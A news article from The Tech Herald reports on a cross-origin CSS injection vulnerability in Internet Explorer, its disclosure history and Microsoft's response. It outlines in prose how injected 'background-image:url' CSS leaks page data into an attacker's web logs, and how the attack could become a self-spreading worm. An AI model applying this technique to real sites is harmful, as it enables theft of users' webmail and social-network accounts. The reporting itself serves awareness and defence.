While most of the IT workforce had a long weekend due to the Labor Day holiday, Microsoft engineers were burning the investigative midnight oil, thanks to a vulnerability in Internet Explorer that has resurfaced. If exploited, the flaw could go viral, leading to attacks on webmail and social networking, to name but a few.

The story itself begins with a blog post made by researcher Chris Evans, where he explained the process of abusing the standards related to the loading of CSS style sheets in a browser. The attack starts with the injection of what the browser sees as valid CSS.

However, the injected code will harvest information from the victim. Using 'background-image:url' for example, an attacker would see all of the harvested data as the image path from the injection point, up until the next ‘);’. At that point, all an attacker need do is examine their own weblogs, and collect the stolen data.

Research, going as far back as 2002, as well as insider talk and further research in 2005 and 2008, shows proof that this type of attack has been known for some time. It doesn’t matter what precedes the injected CSS strings, it could be anything from HTML to XML, the attack would still work. As a cruel bonus, if the injected string is a URL, and even if JavaScript is disabled in the browser, the attack will work.

So what data is harvested? Simply put, information and authentication. As an example, an attacker could send an email to a victim’s webmail account with a link. Once the victim clicks said link, if they are using Internet Explorer, the cross-origin attack is a success and they stand to lose their account.

Another example involves automating the attack, turning it into a Worm. At this point, an attacker could spread a malicious shortened URL and, once clicked, it is instantly re-tweeted.

In a paper recently published by researchers at Carnegie Mellon University (CMU), it was concluded that it's dangerous for browsers to ignore the content type specified on a cross-origin resource.

The report also added that: “Cross-origin CSS attacks have been known for some time, but existing defenses for JavaScript-based CSS attacks are ineffective against the new variants...”

The CMU researchers were able to use the attack to target IMDb, Yahoo Webmail, and Hotmail successfully.

Evans, in a posting to Full Disclosure last Friday, said he has been unsuccessful in getting Microsoft to address this vulnerability. As of now, Redmond is the only browser vendor left vulnerable, due to the fact that Google, Mozilla, Opera, and Apple have all addressed the issue.

To see a demo of an attack, load this page in Internet Explorer, and follow the directions.

At the time of this article, Evans was unavailable for additional comment on the matter.

In his 2009 post, Evans listed two issues preventing the attack from being serious. Quotes and newlines are the mitigating measures, as they stop the attack from working due to the way CSS parsing is specified.

“It turns out that Internet Explorer is not compliant in either of these aspects, leaving it more vulnerable [than] the other browsers. Not only is it the most vulnerable, but it is also the only browser to not have a fix available for its latest stable version,” Evans wrote via his blog.

In a comment to The Tech Herald, Microsoft stated the responsible (coordinated) disclosure policy, but did not get into any other details.

“Microsoft is investigating new public claims of a possible vulnerability in Internet Explorer. We’re currently unaware of any attacks trying to use the claimed vulnerability or of customer impact,” Microsoft’s Jerry Bryant said in an email.

“To minimize risk to computer users, Microsoft continues to encourage coordinated vulnerability disclosure,” he added. “Reporting vulnerabilities directly to vendors helps ensure that customers receive comprehensive, high-quality updates before cyber criminals learn of a vulnerability and work to exploit it... Disclosing vulnerabilities publicly only puts customers at risk.”

The problem is the responsible (coordinated) disclosure policy leaves a little to be desired, as this issue has been known since at least 2008, earlier if you count all the variations.

For Microsoft, it is smart business to be aware of the vulnerabilities patched by the competition. There is little doubt it knew this issue was out there. So while it's nice to have plenty of forewarning, it isn’t like this is a brand new issue to deal with.

We’ll keep tabs on this story and update as needed.

By Steve Ragan

www.thetechherald.com